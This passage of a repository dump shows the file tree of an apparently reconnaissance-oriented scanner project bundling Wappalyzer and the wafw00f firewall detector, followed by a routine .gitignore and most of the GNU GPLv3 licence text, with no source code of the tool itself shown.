├── .gitignore
├── LICENSE
├── README.md
├── Wappalyzer
    ├── Wappalyzer.py
    └── data
    │   └── apps.json
├── domain.txt
├── keyword.txt
├── requirements.txt
├── scan.py
└── wafw00f
    ├── __init__.py
    ├── bin
        └── wafw00f
    ├── lib
        ├── __init__.py
        ├── asciiarts.py
        └── evillib.py
    ├── main.py
    ├── manager.py
    ├── plugins
        ├── __init__.py
        ├── aesecure.py
        ├── airee.py
        ├── airlock.py
        ├── alertlogic.py
        ├── aliyundun.py
        ├── anquanbao.py
        ├── anyu.py
        ├── approach.py
        ├── armor.py
        ├── arvancloud.py
        ├── aspa.py
        ├── aspnetgen.py
        ├── astra.py
        ├── awswaf.py
        ├── azion.py
        ├── baidu.py
        ├── barikode.py
        ├── barracuda.py
        ├── bekchy.py
        ├── beluga.py
        ├── binarysec.py
        ├── bitninja.py
        ├── blockdos.py
        ├── bluedon.py
        ├── bulletproof.py
        ├── cachefly.py
        ├── cachewall.py
        ├── cdnns.py
        ├── cerber.py
        ├── chinacache.py
        ├── chuangyu.py
        ├── ciscoacexml.py
        ├── cloudbric.py
        ├── cloudflare.py
        ├── cloudfloordns.py
        ├── cloudfront.py
        ├── comodo.py
        ├── crawlprotect.py
        ├── denyall.py
        ├── distil.py
        ├── dosarrest.py
        ├── dotdefender.py
        ├── dynamicweb.py
        ├── edgecast.py
        ├── eisoo.py
        ├── expressionengine.py
        ├── f5bigipapm.py
        ├── f5bigipasm.py
        ├── f5bigipltm.py
        ├── f5firepass.py
        ├── f5trafficshield.py
        ├── fastly.py
        ├── fortiweb.py
        ├── frontdoor.py
        ├── godaddy.py
        ├── greywizard.py
        ├── huaweicloud.py
        ├── hyperguard.py
        ├── ibmdatapower.py
        ├── imunify360.py
        ├── incapsula.py
        ├── indusguard.py
        ├── instartdx.py
        ├── isaserver.py
        ├── janusec.py
        ├── jiasule.py
        ├── keycdn.py
        ├── knownsec.py
        ├── kona.py
        ├── limelight.py
        ├── litespeed.py
        ├── malcare.py
        ├── maxcdn.py
        ├── missioncontrol.py
        ├── modsecurity.py
        ├── naxsi.py
        ├── nemesida.py
        ├── netcontinuum.py
        ├── netscaler.py
        ├── nevisproxy.py
        ├── newdefend.py
        ├── nexusguard.py
        ├── ninja.py
        ├── nsfocus.py
        ├── nullddos.py
        ├── onmessage.py
        ├── openresty.py
        ├── oraclecloud.py
        ├── paloalto.py
        ├── pentawaf.py
        ├── perimeterx.py
        ├── pksec.py
        ├── powercdn.py
        ├── profense.py
        ├── ptaf.py
        ├── puhui.py
        ├── qiniu.py
        ├── radware.py
        ├── reblaze.py
        ├── rsfirewall.py
        ├── rvmode.py
        ├── sabre.py
        ├── safe3.py
        ├── safedog.py
        ├── safeline.py
        ├── secking.py
        ├── secupress.py
        ├── secureentry.py
        ├── secureiis.py
        ├── securesphere.py
        ├── senginx.py
        ├── serverdefender.py
        ├── shadowd.py
        ├── shieldsecurity.py
        ├── siteground.py
        ├── siteguard.py
        ├── sitelock.py
        ├── sonicwall.py
        ├── sophos.py
        ├── squarespace.py
        ├── squidproxy.py
        ├── stackpath.py
        ├── sucuri.py
        ├── tencent.py
        ├── teros.py
        ├── transip.py
        ├── uewaf.py
        ├── urlmaster.py
        ├── urlscan.py
        ├── varnish.py
        ├── viettel.py
        ├── virusdie.py
        ├── wallarm.py
        ├── watchguard.py
        ├── webarx.py
        ├── webknight.py
        ├── webland.py
        ├── webray.py
        ├── webseal.py
        ├── webtotem.py
        ├── west263cdn.py
        ├── wordfence.py
        ├── wts.py
        ├── wzb360.py
        ├── xlabssecuritywaf.py
        ├── xuanwudun.py
        ├── yundun.py
        ├── yunsuo.py
        ├── yxlink.py
        ├── zenedge.py
        └── zscaler.py
    └── wafprio.py


/.gitignore:
--------------------------------------------------------------------------------
 1 | # See https://help.github.com/ignore-files/ for more about ignoring files.
 2 | 
 3 | # dependencies
 4 | /node_modules
 5 | 
 6 | # testing
 7 | /coverage
 8 | 
 9 | # production
10 | /build
11 | /Subdomain/__pycache__
12 | # misc
13 | .DS_Store
14 | .env.local
15 | .env.development.local
16 | .env.test.local
17 | .env.production.local
18 | 
19 | npm-debug.log*
20 | yarn-debug.log*
21 | yarn-error.log*
22 | .idea
23 | yarn.lock
24 | 
25 | /venv
26 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
  1 |                     GNU GENERAL PUBLIC LICENSE
  2 |                        Version 3, 29 June 2007
  3 | 
  4 |  Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
  5 |  Everyone is permitted to copy and distribute verbatim copies
  6 |  of this license document, but changing it is not allowed.
  7 | 
  8 |                             Preamble
  9 | 
 10 |   The GNU General Public License is a free, copyleft license for
 11 | software and other kinds of works.
 12 | 
 13 |   The licenses for most software and other practical works are designed
 14 | to take away your freedom to share and change the works.  By contrast,
 15 | the GNU General Public License is intended to guarantee your freedom to
 16 | share and change all versions of a program--to make sure it remains free
 17 | software for all its users.  We, the Free Software Foundation, use the
 18 | GNU General Public License for most of our software; it applies also to
 19 | any other work released this way by its authors.  You can apply it to
 20 | your programs, too.
 21 | 
 22 |   When we speak of free software, we are referring to freedom, not
 23 | price.  Our General Public Licenses are designed to make sure that you
 24 | have the freedom to distribute copies of free software (and charge for
 25 | them if you wish), that you receive source code or can get it if you
 26 | want it, that you can change the software or use pieces of it in new
 27 | free programs, and that you know you can do these things.
 28 | 
 29 |   To protect your rights, we need to prevent others from denying you
 30 | these rights or asking you to surrender the rights.  Therefore, you have
 31 | certain responsibilities if you distribute copies of the software, or if
 32 | you modify it: responsibilities to respect the freedom of others.
 33 | 
 34 |   For example, if you distribute copies of such a program, whether
 35 | gratis or for a fee, you must pass on to the recipients the same
 36 | freedoms that you received.  You must make sure that they, too, receive
 37 | or can get the source code.  And you must show them these terms so they
 38 | know their rights.
 39 | 
 40 |   Developers that use the GNU GPL protect your rights with two steps:
 41 | (1) assert copyright on the software, and (2) offer you this License
 42 | giving you legal permission to copy, distribute and/or modify it.
 43 | 
 44 |   For the developers' and authors' protection, the GPL clearly explains
 45 | that there is no warranty for this free software.  For both users' and
 46 | authors' sake, the GPL requires that modified versions be marked as
 47 | changed, so that their problems will not be attributed erroneously to
 48 | authors of previous versions.
 49 | 
 50 |   Some devices are designed to deny users access to install or run
 51 | modified versions of the software inside them, although the manufacturer
 52 | can do so.  This is fundamentally incompatible with the aim of
 53 | protecting users' freedom to change the software.  The systematic
 54 | pattern of such abuse occurs in the area of products for individuals to
 55 | use, which is precisely where it is most unacceptable.  Therefore, we
 56 | have designed this version of the GPL to prohibit the practice for those
 57 | products.  If such problems arise substantially in other domains, we
 58 | stand ready to extend this provision to those domains in future versions
 59 | of the GPL, as needed to protect the freedom of users.
 60 | 
 61 |   Finally, every program is threatened constantly by software patents.
 62 | States should not allow patents to restrict development and use of
 63 | software on general-purpose computers, but in those that do, we wish to
 64 | avoid the special danger that patents applied to a free program could
 65 | make it effectively proprietary.  To prevent this, the GPL assures that
 66 | patents cannot be used to render the program non-free.
 67 | 
 68 |   The precise terms and conditions for copying, distribution and
 69 | modification follow.
 70 | 
 71 |                        TERMS AND CONDITIONS
 72 | 
 73 |   0. Definitions.
 74 | 
 75 |   "This License" refers to version 3 of the GNU General Public License.
 76 | 
 77 |   "Copyright" also means copyright-like laws that apply to other kinds of
 78 | works, such as semiconductor masks.
 79 | 
 80 |   "The Program" refers to any copyrightable work licensed under this
 81 | License.  Each licensee is addressed as "you".  "Licensees" and
 82 | "recipients" may be individuals or organizations.
 83 | 
 84 |   To "modify" a work means to copy from or adapt all or part of the work
 85 | in a fashion requiring copyright permission, other than the making of an
 86 | exact copy.  The resulting work is called a "modified version" of the
 87 | earlier work or a work "based on" the earlier work.
 88 | 
 89 |   A "covered work" means either the unmodified Program or a work based
 90 | on the Program.
 91 | 
 92 |   To "propagate" a work means to do anything with it that, without
 93 | permission, would make you directly or secondarily liable for
 94 | infringement under applicable copyright law, except executing it on a
 95 | computer or modifying a private copy.  Propagation includes copying,
 96 | distribution (with or without modification), making available to the
 97 | public, and in some countries other activities as well.
 98 | 
 99 |   To "convey" a work means any kind of propagation that enables other
100 | parties to make or receive copies.  Mere interaction with a user through
101 | a computer network, with no transfer of a copy, is not conveying.
102 | 
103 |   An interactive user interface displays "Appropriate Legal Notices"
104 | to the extent that it includes a convenient and prominently visible
105 | feature that (1) displays an appropriate copyright notice, and (2)
106 | tells the user that there is no warranty for the work (except to the
107 | extent that warranties are provided), that licensees may convey the
108 | work under this License, and how to view a copy of this License.  If
109 | the interface presents a list of user commands or options, such as a
110 | menu, a prominent item in the list meets this criterion.
111 | 
112 |   1. Source Code.
113 | 
114 |   The "source code" for a work means the preferred form of the work
115 | for making modifications to it.  "Object code" means any non-source
116 | form of a work.
117 | 
118 |   A "Standard Interface" means an interface that either is an official
119 | standard defined by a recognized standards body, or, in the case of
120 | interfaces specified for a particular programming language, one that
121 | is widely used among developers working in that language.
122 | 
123 |   The "System Libraries" of an executable work include anything, other
124 | than the work as a whole, that (a) is included in the normal form of
125 | packaging a Major Component, but which is not part of that Major
126 | Component, and (b) serves only to enable use of the work with that
127 | Major Component, or to implement a Standard Interface for which an
128 | implementation is available to the public in source code form.  A
129 | "Major Component", in this context, means a major essential component
130 | (kernel, window system, and so on) of the specific operating system
131 | (if any) on which the executable work runs, or a compiler used to
132 | produce the work, or an object code interpreter used to run it.
133 | 
134 |   The "Corresponding Source" for a work in object code form means all
135 | the source code needed to generate, install, and (for an executable
136 | work) run the object code and to modify the work, including scripts to
137 | control those activities.  However, it does not include the work's
138 | System Libraries, or general-purpose tools or generally available free
139 | programs which are used unmodified in performing those activities but
140 | which are not part of the work.  For example, Corresponding Source
141 | includes interface definition files associated with source files for
142 | the work, and the source code for shared libraries and dynamically
143 | linked subprograms that the work is specifically designed to require,
144 | such as by intimate data communication or control flow between those
145 | subprograms and other parts of the work.
146 | 
147 |   The Corresponding Source need not include anything that users
148 | can regenerate automatically from other parts of the Corresponding
149 | Source.
150 | 
151 |   The Corresponding Source for a work in source code form is that
152 | same work.
153 | 
154 |   2. Basic Permissions.
155 | 
156 |   All rights granted under this License are granted for the term of
157 | copyright on the Program, and are irrevocable provided the stated
158 | conditions are met.  This License explicitly affirms your unlimited
159 | permission to run the unmodified Program.  The output from running a
160 | covered work is covered by this License only if the output, given its
161 | content, constitutes a covered work.  This License acknowledges your
162 | rights of fair use or other equivalent, as provided by copyright law.
163 | 
164 |   You may make, run and propagate covered works that you do not
165 | convey, without conditions so long as your license otherwise remains
166 | in force.  You may convey covered works to others for the sole purpose
167 | of having them make modifications exclusively for you, or provide you
168 | with facilities for running those works, provided that you comply with
169 | the terms of this License in conveying all material for which you do
170 | not control copyright.  Those thus making or running the covered works
171 | for you must do so exclusively on your behalf, under your direction
172 | and control, on terms that prohibit them from making any copies of
173 | your copyrighted material outside their relationship with you.
174 | 
175 |   Conveying under any other circumstances is permitted solely under
176 | the conditions stated below.  Sublicensing is not allowed; section 10
177 | makes it unnecessary.
178 | 
179 |   3. Protecting Users' Legal Rights From Anti-Circumvention Law.
180 | 
181 |   No covered work shall be deemed part of an effective technological
182 | measure under any applicable law fulfilling obligations under article
183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or
184 | similar laws prohibiting or restricting circumvention of such
185 | measures.
186 | 
187 |   When you convey a covered work, you waive any legal power to forbid
188 | circumvention of technological measures to the extent such circumvention
189 | is effected by exercising rights under this License with respect to
190 | the covered work, and you disclaim any intention to limit operation or
191 | modification of the work as a means of enforcing, against the work's
192 | users, your or third parties' legal rights to forbid circumvention of
193 | technological measures.
194 | 
195 |   4. Conveying Verbatim Copies.
196 | 
197 |   You may convey verbatim copies of the Program's source code as you
198 | receive it, in any medium, provided that you conspicuously and
199 | appropriately publish on each copy an appropriate copyright notice;
200 | keep intact all notices stating that this License and any
201 | non-permissive terms added in accord with section 7 apply to the code;
202 | keep intact all notices of the absence of any warranty; and give all
203 | recipients a copy of this License along with the Program.
204 | 
205 |   You may charge any price or no price for each copy that you convey,
206 | and you may offer support or warranty protection for a fee.
207 | 
208 |   5. Conveying Modified Source Versions.
209 | 
210 |   You may convey a work based on the Program, or the modifications to
211 | produce it from the Program, in the form of source code under the
212 | terms of section 4, provided that you also meet all of these conditions:
213 | 
214 |     a) The work must carry prominent notices stating that you modified
215 |     it, and giving a relevant date.
216 | 
217 |     b) The work must carry prominent notices stating that it is
218 |     released under this License and any conditions added under section
219 |     7.  This requirement modifies the requirement in section 4 to
220 |     "keep intact all notices".
221 | 
222 |     c) You must license the entire work, as a whole, under this
223 |     License to anyone who comes into possession of a copy.  This
224 |     License will therefore apply, along with any applicable section 7
225 |     additional terms, to the whole of the work, and all its parts,
226 |     regardless of how they are packaged.  This License gives no
227 |     permission to license the work in any other way, but it does not
228 |     invalidate such permission if you have separately received it.
229 | 
230 |     d) If the work has interactive user interfaces, each must display
231 |     Appropriate Legal Notices; however, if the Program has interactive
232 |     interfaces that do not display Appropriate Legal Notices, your
233 |     work need not make them do so.
234 | 
235 |   A compilation of a covered work with other separate and independent
236 | works, which are not by their nature extensions of the covered work,
237 | and which are not combined with it such as to form a larger program,
238 | in or on a volume of a storage or distribution medium, is called an
239 | "aggregate" if the compilation and its resulting copyright are not
240 | used to limit the access or legal rights of the compilation's users
241 | beyond what the individual works permit.  Inclusion of a covered work
242 | in an aggregate does not cause this License to apply to the other
243 | parts of the aggregate.
244 | 
245 |   6. Conveying Non-Source Forms.
246 | 
247 |   You may convey a covered work in object code form under the terms
248 | of sections 4 and 5, provided that you also convey the
249 | machine-readable Corresponding Source under the terms of this License,
250 | in one of these ways:
251 | 
252 |     a) Convey the object code in, or embodied in, a physical product
253 |     (including a physical distribution medium), accompanied by the
254 |     Corresponding Source fixed on a durable physical medium
255 |     customarily used for software interchange.
256 | 
257 |     b) Convey the object code in, or embodied in, a physical product
258 |     (including a physical distribution medium), accompanied by a
259 |     written offer, valid for at least three years and valid for as
260 |     long as you offer spare parts or customer support for that product
261 |     model, to give anyone who possesses the object code either (1) a
262 |     copy of the Corresponding Source for all the software in the
263 |     product that is covered by this License, on a durable physical
264 |     medium customarily used for software interchange, for a price no
265 |     more than your reasonable cost of physically performing this
266 |     conveying of source, or (2) access to copy the
267 |     Corresponding Source from a network server at no charge.
268 | 
269 |     c) Convey individual copies of the object code with a copy of the
270 |     written offer to provide the Corresponding Source.  This
271 |     alternative is allowed only occasionally and noncommercially, and
272 |     only if you received the object code with such an offer, in accord
273 |     with subsection 6b.
274 | 
275 |     d) Convey the object code by offering access from a designated
276 |     place (gratis or for a charge), and offer equivalent access to the
277 |     Corresponding Source in the same way through the same place at no
278 |     further charge.  You need not require recipients to copy the
279 |     Corresponding Source along with the object code.  If the place to
280 |     copy the object code is a network server, the Corresponding Source
281 |     may be on a different server (operated by you or a third party)
282 |     that supports equivalent copying facilities, provided you maintain
283 |     clear directions next to the object code saying where to find the
284 |     Corresponding Source.  Regardless of what server hosts the
285 |     Corresponding Source, you remain obligated to ensure that it is
286 |     available for as long as needed to satisfy these requirements.
287 | 
288 |     e) Convey the object code using peer-to-peer transmission, provided
289 |     you inform other peers where the object code and Corresponding
290 |     Source of the work are being offered to the general public at no
291 |     charge under subsection 6d.
292 | 
293 |   A separable portion of the object code, whose source code is excluded
294 | from the Corresponding Source as a System Library, need not be
295 | included in conveying the object code work.
296 | 
297 |   A "User Product" is either (1) a "consumer product", which means any
298 | tangible personal property which is normally used for personal, family,
299 | or household purposes, or (2) anything designed or sold for incorporation
300 | into a dwelling.  In determining whether a product is a consumer product,
301 | doubtful cases shall be resolved in favor of coverage.  For a particular
302 | product received by a particular user, "normally used" refers to a
303 | typical or common use of that class of product, regardless of the status
304 | of the particular user or of the way in which the particular user
305 | actually uses, or expects or is expected to use, the product.  A product
306 | is a consumer product regardless of whether the product has substantial
307 | commercial, industrial or non-consumer uses, unless such uses represent
308 | the only significant mode of use of the product.
309 | 
310 |   "Installation Information" for a User Product means any methods,
311 | procedures, authorization keys, or other information required to install
312 | and execute modified versions of a covered work in that User Product from
313 | a modified version of its Corresponding Source.  The information must
314 | suffice to ensure that the continued functioning of the modified object
315 | code is in no case prevented or interfered with solely because
316 | modification has been made.
317 | 
318 |   If you convey an object code work under this section in, or with, or
319 | specifically for use in, a User Product, and the conveying occurs as
320 | part of a transaction in which the right of possession and use of the
321 | User Product is transferred to the recipient in perpetuity or for a
322 | fixed term (regardless of how the transaction is characterized), the
323 | Corresponding Source conveyed under this section must be accompanied
324 | by the Installation Information.  But this requirement does not apply
325 | if neither you nor any third party retains the ability to install
326 | modified object code on the User Product (for example, the work has
327 | been installed in ROM).
328 | 
329 |   The requirement to provide Installation Information does not include a
330 | requirement to continue to provide support service, warranty, or updates
331 | for a work that has been modified or installed by the recipient, or for
332 | the User Product in which it has been modified or installed.  Access to a
333 | network may be denied when the modification itself materially and
334 | adversely affects the operation of the network or violates the rules and
335 | protocols for communication across the network.
336 | 
337 |   Corresponding Source conveyed, and Installation Information provided,
338 | in accord with this section must be in a format that is publicly
339 | documented (and with an implementation available to the public in
340 | source code form), and must require no special password or key for
341 | unpacking, reading or copying.
342 | 
343 |   7. Additional Terms.
344 | 
345 |   "Additional permissions" are terms that supplement the terms of this
346 | License by making exceptions from one or more of its conditions.
347 | Additional permissions that are applicable to the entire Program shall
348 | be treated as though they were included in this License, to the extent
349 | that they are valid under applicable law.  If additional permissions
350 | apply only to part of the Program, that part may be used separately
351 | under those permissions, but the entire Program remains governed by
352 | this License without regard to the additional permissions.
353 | 
354 |   When you convey a copy of a covered work, you may at your option
355 | remove any additional permissions from that copy, or from any part of
356 | it.  (Additional permissions may be written to require their own
357 | removal in certain cases when you modify the work.)  You may place
358 | additional permissions on material, added by you to a covered work,
359 | for which you have or can give appropriate copyright permission.
360 | 
361 |   Notwithstanding any other provision of this License, for material you
362 | add to a covered work, you may (if authorized by the copyright holders of
363 | that material) supplement the terms of this License with terms:
364 | 
365 |     a) Disclaiming warranty or limiting liability differently from the
366 |     terms of sections 15 and 16 of this License; or
367 | 
368 |     b) Requiring preservation of specified reasonable legal notices or
369 |     author attributions in that material or in the Appropriate Legal
370 |     Notices displayed by works containing it; or
371 | 
372 |     c) Prohibiting misrepresentation of the origin of that material, or
373 |     requiring that modified versions of such material be marked in
374 |     reasonable ways as different from the original version; or
375 | 
376 |     d) Limiting the use for publicity purposes of names of licensors or
377 |     authors of the material; or
378 | 
379 |     e) Declining to grant rights under trademark law for use of some
380 |     trade names, trademarks, or service marks; or
381 | 
382 |     f) Requiring indemnification of licensors and authors of that
383 |     material by anyone who conveys the material (or modified versions of
384 |     it) with contractual assumptions of liability to the recipient, for
385 |     any liability that these contractual assumptions directly impose on
386 |     those licensors and authors.
387 | 
388 |   All other non-permissive additional terms are considered "further
389 | restrictions" within the meaning of section 10.  If the Program as you
390 | received it, or any part of it, contains a notice stating that it is
391 | governed by this License along with a term that is a further
392 | restriction, you may remove that term.  If a license document contains
393 | a further restriction but permits relicensing or conveying under this
394 | License, you may add to a covered work material governed by the terms
395 | of that license document, provided that the further restriction does
396 | not survive such relicensing or conveying.
397 | 
398 |   If you add terms to a covered work in accord with this section, you
399 | must place, in the relevant source files, a statement of the
400 | additional terms that apply to those files, or a notice indicating
401 | where to find the applicable terms.
402 | 
403 |   Additional terms, permissive or non-permissive, may be stated in the
404 | form of a separately written license, or stated as exceptions;
405 | the above requirements apply either way.
406 | 
407 |   8. Termination.
408 | 
409 |   You may not propagate or modify a covered work except as expressly
410 | provided under this License.  Any attempt otherwise to propagate or
411 | modify it is void, and will automatically terminate your rights under
412 | this License (including any patent licenses granted under the third
413 | paragraph of section 11).
414 | 
415 |   However, if you cease all violation of this License, then your
416 | license from a particular copyright holder is reinstated (a)
417 | provisionally, unless and until the copyright holder explicitly and
418 | finally terminates your license, and (b) permanently, if the copyright
419 | holder fails to notify you of the violation by some reasonable means
420 | prior to 60 days after the cessation.
421 | 
422 |   Moreover, your license from a particular copyright holder is
423 | reinstated permanently if the copyright holder notifies you of the
424 | violation by some reasonable means, this is the first time you have
425 | received notice of violation of this License (for any work) from that
426 | copyright holder, and you cure the violation prior to 30 days after
427 | your receipt of the notice.
428 | 
429 |   Termination of your rights under this section does not terminate the
430 | licenses of parties who have received copies or rights from you under
431 | this License.  If your rights have been terminated and not permanently
432 | reinstated, you do not qualify to receive new licenses for the same
433 | material under section 10.
434 | 
435 |   9. Acceptance Not Required for Having Copies.
436 | 
437 |   You are not required to accept this License in order to receive or
438 | run a copy of the Program.  Ancillary propagation of a covered work
439 | occurring solely as a consequence of using peer-to-peer transmission
440 | to receive a copy likewise does not require acceptance.  However,
441 | nothing other than this License grants you permission to propagate or
442 | modify any covered work.  These actions infringe copyright if you do
443 | not accept this License.  Therefore, by modifying or propagating a
444 | covered work, you indicate your acceptance of this License to do so.
445 | 
446 |   10. Automatic Licensing of Downstream Recipients.
447 | 
448 |   Each time you convey a covered work, the recipient automatically
449 | receives a license from the original licensors, to run, modify and
450 | propagate that work, subject to this License.  You are not responsible
451 | for enforcing compliance by third parties with this License.
452 | 
453 |   An "entity transaction" is a transaction transferring control of an
454 | organization, or substantially all assets of one, or subdividing an
455 | organization, or merging organizations.  If propagation of a covered
456 | work results from an entity transaction, each party to that
457 | transaction who receives a copy of the work also receives whatever
458 | licenses to the work the party's predecessor in interest had or could
459 | give under the previous paragraph, plus a right to possession of the
460 | Corresponding Source of the work from the predecessor in interest, if
461 | the predecessor has it or can get it with reasonable efforts.
462 | 
463 |   You may not impose any further restrictions on the exercise of the
464 | rights granted or affirmed under this License.  For example, you may
465 | not impose a license fee, royalty, or other charge for exercise of
466 | rights granted under this License, and you may not initiate litigation
467 | (including a cross-claim or counterclaim in a lawsuit) alleging that
468 | any patent claim is infringed by making, using, selling, offering for
469 | sale, or importing the Program or any portion of it.
470 | 
471 |   11. Patents.
472 | 
473 |   A "contributor" is a copyright holder who authorizes use under this
474 | License of the Program or a work on which the Program is based.  The
475 | work thus licensed is called the contributor's "contributor version".
476 | 
477 |   A contributor's "essential patent claims" are all patent claims
478 | owned or controlled by the contributor, whether already acquired or
479 | hereafter acquired, that would be infringed by some manner, permitted
480 | by this License, of making, using, or selling its contributor version,
481 | but do not include claims that would be infringed only as a
482 | consequence of further modification of the contributor version.  For
483 | purposes of this definition, "control" includes the right to grant
484 | patent sublicenses in a manner consistent with the requirements of
485 | this License.
486 | 
487 |   Each contributor grants you a non-exclusive, worldwide, royalty-free
488 | patent license under the contributor's essential patent claims, to
489 | make, use, sell, offer for sale, import and otherwise run, modify and
490 | propagate the contents of its contributor version.
491 | 
492 |   In the following three paragraphs, a "patent license" is any express
493 | agreement or commitment, however denominated, not to enforce a patent
494 | (such as an express permission to practice a patent or covenant not to
495 | sue for patent infringement).  To "grant" such a patent license to a
496 | party means to make such an agreement or commitment not to enforce a
497 | patent against the party.
498 | 
499 |   If you convey a covered work, knowingly relying on a patent license,
500 | and the Corresponding Source of the work is not available for anyone
501 | to copy, free of charge and under the terms of this License, through a
502 | publicly available network server or other readily accessible means,
503 | then you must either (1) cause the Corresponding Source to be so
504 | available, or (2) arrange to deprive yourself of the benefit of the
505 | patent license for this particular work, or (3) arrange, in a manner
506 | consistent with the requirements of this License, to extend the patent
507 | license to downstream recipients.  "Knowingly relying" means you have
508 | actual knowledge that, but for the patent license, your conveying the
509 | covered work in a country, or your recipient's use of the covered work
510 | in a country, would infringe one or more identifiable patents in that
511 | country that you have reason to believe are valid.
512 | 
513 |   If, pursuant to or in connection with a single transaction or
514 | arrangement, you convey, or propagate by procuring conveyance of, a
515 | covered work, and grant a patent license to some of the parties
516 | receiving the covered work authorizing them to use, propagate, modify
517 | or convey a specific copy of the covered work, then the patent license
518 | you grant is automatically extended to all recipients of the covered
519 | work and works based on it.
520 | 
521 |   A patent license is "discriminatory" if it does not include within
522 | the scope of its coverage, prohibits the exercise of, or is
523 | conditioned on the non-exercise of one or more of the rights that are
524 | specifically granted under this License.  You may not convey a covered
525 | work if you are a party to an arrangement with a third party that is
526 | in the business of distributing software, under which you make payment
527 | to the third party based on the extent of your activity of conveying
528 | the work, and under which the third party grants, to any of the
529 | parties who would receive the covered work from you, a discriminatory
530 | patent license (a) in connection with copies of the covered work
531 | conveyed by you (or copies made from those copies), or (b) primarily
532 | for and in connection with specific products or compilations that
533 | contain the covered work, unless you entered into that arrangement,
534 | or that patent license was granted, prior to 28 March 2007.
535 | 
536 |   Nothing in this License shall be construed as excluding or limiting
537 | any implied license or other defenses to infringement that may
538 | otherwise be available to you under applicable patent law.
539 | 
540 |   12. No Surrender of Others' Freedom.
541 | 
542 |   If conditions are imposed on you (whether by court order, agreement or
543 | otherwise) that contradict the conditions of this License, they do not
544 | excuse you from the conditions of this License.  If you cannot convey a
545 | covered work so as to satisfy simultaneously your obligations under this
546 | License and any other pertinent obligations, then as a consequence you may
547 | not convey it at all.  For example, if you agree to terms that obligate you
548 | to collect a royalty for further conveying from those to whom you convey
549 | the Program, the only way you could satisfy both those terms and this
550 | License would be to refrain entirely from conveying the Program.
551 | 
552 |   13. Use with the GNU Affero General Public License.
553 | 
554 |   Notwithstanding any other provision of this License, you have
555 | permission to link or combine any covered work with a work licensed
556 | under version 3 of the GNU Affero General Public License into a single
557 | combined work, and to convey the resulting work.  The terms of this
558 | License will continue to apply to the part which is the covered work,
559 | but the special requirements of the GNU Affero General Public License,
560 | section 13, concerning interaction through a network will apply to the
561 | combination as such.
562 | 
563 |   14. Revised Versions of this License.
564 | 
565 |   The Free Software Foundation may publish revised and/or new versions of
566 | the GNU General Public License from time to time.  Such new versions will
567 | be similar in spirit to the present version, but may differ in detail to
568 | address new problems or concerns.
569 | 
570 |   Each version is given a distinguishing version number.  If the
571 | Program specifies that a certain numbered version of the GNU General
572 | Public License "or any later version" applies to it, you have the
573 | option of following the terms and conditions either of that numbered
574 | version or of any later version published by the Free Software
575 | Foundation.  If the Program does not specify a version number of the
576 | GNU General Public License, you may choose any version ever published
577 | by the Free Software Foundation.
578 | 
579 |   If the Program specifies that a proxy can decide which future
580 | versions of the GNU General Public License can be used, that proxy's
581 | public statement of acceptance of a version permanently authorizes you
582 | to choose that version for the Program.
583 | 
584 |   Later license versions may give you additional or different
585 | permissions.  However, no additional obligations are imposed on any
586 | author or copyright holder as a result of your choosing to follow a
587 | later version.
588 | 
589 |   15. Disclaimer of Warranty.
590 | 
591 |   THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
592 | APPLICABLE LAW.  EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
596 | PURPOSE.  THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
597 | IS WITH YOU.  SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
599 | 
600 |   16. Limitation of Liability.
601 | 
602 |   IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
610 | SUCH DAMAGES.
611 | 
612 |   17. Interpretation of Sections 15 and 16.
613 | 
614 |   If the disclaimer of warranty and limitation of liability provided
615 | above cannot be given local legal effect according to their terms,
616 | reviewing courts shall apply local law that most closely approximates
617 | an absolute waiver of all civil liability in connection with the
618 | Program, unless a warranty or assumption of liability accompanies a
619 | copy of the Program in return for a fee.
620 | 
621 |                      END OF TERMS AND CONDITIONS
622 | 
623 |             How to Apply These Terms to Your New Programs
624 | 
625 |   If you develop a new program, and you want it to be of the greatest
626 | possible use to the public, the best way to achieve this is to make it
627 | free software which everyone can redistribute and change under these terms.
628 | 
629 |   To do so, attach the following notices to the program.  It is safest
630 | to attach them to the start of each source file to most effectively
631 | state the exclusion of warranty; and each file should have at least
632 | the "copyright" line and a pointer to where the full notice is found.
633 | 
634 |     <one line to give the program's name and a brief idea of what it does.>
635 |     Copyright (C) <year>  <name of author>
636 | 
637 |     This program is free software: you can redistribute it and/or modify
638 |     it under the terms of the GNU General Public License as published by
639 |     the Free Software Foundation, either version 3 of the License, or
640 |     (at your option) any later version.
641 | 
642 |     This program is distributed in the hope that it will be useful,
643 |     but WITHOUT ANY WARRANTY; without even the implied warranty of
644 |     MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
645 |     GNU General Public License for more details.
646 | 
647 |     You should have received a copy of the GNU General Public License
648 |     along with this program.  If not, see <https://www.gnu.org/licenses/>.
649 | 
650 | Also add information on how to contact you by electronic and paper mail.
651 | 
652 |   If the program does terminal interaction, make it output a short
653 | notice like this when it starts in an interactive mode:
654 | 
